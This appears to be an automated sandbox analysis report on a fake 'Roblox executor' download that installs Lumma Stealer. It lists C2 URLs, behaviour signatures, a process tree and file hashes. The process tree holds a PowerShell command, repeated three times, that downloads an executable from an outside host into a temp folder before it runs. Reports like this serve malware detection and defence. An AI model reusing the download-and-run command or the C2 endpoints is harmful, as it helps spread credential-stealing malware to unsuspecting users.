Analysis

  • max time kernel
    185s
  • max time network
    188s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07-01-2025 15:51

General

  • Target

    https://sourceforge.net/projects/roblox-executor-engine/

Malware Config

Extracted

Family

lumma

C2

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 9 IoCs
  • Executes dropped EXE 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://sourceforge.net/projects/roblox-executor-engine/
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa95903cb8,0x7ffa95903cc8,0x7ffa95903cd8
      2⤵
        PID:4712
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
        2⤵
          PID:772
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5124
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
          2⤵
            PID:5544
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
            2⤵
              PID:2660
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
              2⤵
                PID:2584
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1
                2⤵
                  PID:700
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
                  2⤵
                    PID:5672
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
                    2⤵
                      PID:6064
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3824
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
                      2⤵
                        PID:3012
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
                        2⤵
                          PID:1688
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2340
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
                          2⤵
                            PID:4204
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
                            2⤵
                              PID:5592
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
                              2⤵
                                PID:4744
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
                                2⤵
                                  PID:4176
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
                                  2⤵
                                    PID:5432
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
                                    2⤵
                                      PID:1900
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
                                      2⤵
                                        PID:700
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
                                        2⤵
                                          PID:3500
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
                                          2⤵
                                            PID:1316
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
                                            2⤵
                                              PID:2672
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
                                              2⤵
                                                PID:2720
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
                                                2⤵
                                                  PID:4440
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
                                                  2⤵
                                                    PID:3216
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                                    2⤵
                                                      PID:924
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                                                      2⤵
                                                        PID:4048
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
                                                        2⤵
                                                          PID:1920
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
                                                          2⤵
                                                            PID:2348
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
                                                            2⤵
                                                              PID:2564
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7048 /prefetch:8
                                                              2⤵
                                                              • NTFS ADS
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3468
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
                                                              2⤵
                                                                PID:5172
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
                                                                2⤵
                                                                  PID:4804
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
                                                                  2⤵
                                                                    PID:3792
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
                                                                    2⤵
                                                                      PID:2860
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
                                                                      2⤵
                                                                        PID:6132
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,8730165552886175054,3382626269138392023,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3436 /prefetch:2
                                                                        2⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5756
                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:5516
                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                        1⤵
                                                                          PID:1244
                                                                        • C:\Windows\System32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                          1⤵
                                                                            PID:1608
                                                                          • C:\Users\Admin\Downloads\Executor Release v1.2\Executor.exe
                                                                            "C:\Users\Admin\Downloads\Executor Release v1.2\Executor.exe"
                                                                            1⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3484
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'https://moolaplace.com/requer.exe' -OutFile 'C:\Windows\Temp\4kixtuyu.njl.exe'"
                                                                              2⤵
                                                                              • Blocklisted process makes network request
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5960
                                                                            • C:\Windows\Temp\4kixtuyu.njl.exe
                                                                              "C:\Windows\Temp\4kixtuyu.njl.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3756
                                                                              • C:\Windows\Temp\4kixtuyu.njl.exe
                                                                                "C:\Windows\Temp\4kixtuyu.njl.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2132
                                                                              • C:\Windows\Temp\4kixtuyu.njl.exe
                                                                                "C:\Windows\Temp\4kixtuyu.njl.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1920
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 832
                                                                                3⤵
                                                                                • Program crash
                                                                                PID:72
                                                                          • C:\Windows\system32\taskmgr.exe
                                                                            "C:\Windows\system32\taskmgr.exe" /0
                                                                            1⤵
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:3396
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3756 -ip 3756
                                                                            1⤵
                                                                              PID:952
                                                                            • C:\Users\Admin\Downloads\Executor Release v1.2\Executor.exe
                                                                              "C:\Users\Admin\Downloads\Executor Release v1.2\Executor.exe"
                                                                              1⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5064
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'https://moolaplace.com/requer.exe' -OutFile 'C:\Windows\Temp\pi1oh41f.ull.exe'"
                                                                                2⤵
                                                                                • Blocklisted process makes network request
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1524
                                                                              • C:\Windows\Temp\pi1oh41f.ull.exe
                                                                                "C:\Windows\Temp\pi1oh41f.ull.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:280
                                                                                • C:\Windows\Temp\pi1oh41f.ull.exe
                                                                                  "C:\Windows\Temp\pi1oh41f.ull.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4944
                                                                                • C:\Windows\Temp\pi1oh41f.ull.exe
                                                                                  "C:\Windows\Temp\pi1oh41f.ull.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4324
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 804
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:5748
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 280 -ip 280
                                                                              1⤵
                                                                                PID:6016
                                                                              • C:\Users\Admin\Downloads\Executor Release v1.2\Executor.exe
                                                                                "C:\Users\Admin\Downloads\Executor Release v1.2\Executor.exe"
                                                                                1⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3348
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'https://moolaplace.com/requer.exe' -OutFile 'C:\Windows\Temp\yih3dvmk.acq.exe'"
                                                                                  2⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2040
                                                                                • C:\Windows\Temp\yih3dvmk.acq.exe
                                                                                  "C:\Windows\Temp\yih3dvmk.acq.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3412
                                                                                  • C:\Windows\Temp\yih3dvmk.acq.exe
                                                                                    "C:\Windows\Temp\yih3dvmk.acq.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2132
                                                                                  • C:\Windows\Temp\yih3dvmk.acq.exe
                                                                                    "C:\Windows\Temp\yih3dvmk.acq.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1336
                                                                                  • C:\Windows\Temp\yih3dvmk.acq.exe
                                                                                    "C:\Windows\Temp\yih3dvmk.acq.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5500
                                                                                  • C:\Windows\Temp\yih3dvmk.acq.exe
                                                                                    "C:\Windows\Temp\yih3dvmk.acq.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4840
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 840
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:4832
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3412 -ip 3412
                                                                                1⤵
                                                                                  PID:5592

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  55540a230bdab55187a841cfe1aa1545

                                                                                  SHA1

                                                                                  363e4734f757bdeb89868efe94907774a327695e

                                                                                  SHA256

                                                                                  d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

                                                                                  SHA512

                                                                                  c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DABA17F5E36CBE65640DD2FE24F104E7

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  c6150925cfea5941ddc7ff2a0a506692

                                                                                  SHA1

                                                                                  9e99a48a9960b14926bb7f3b02e22da2b0ab7280

                                                                                  SHA256

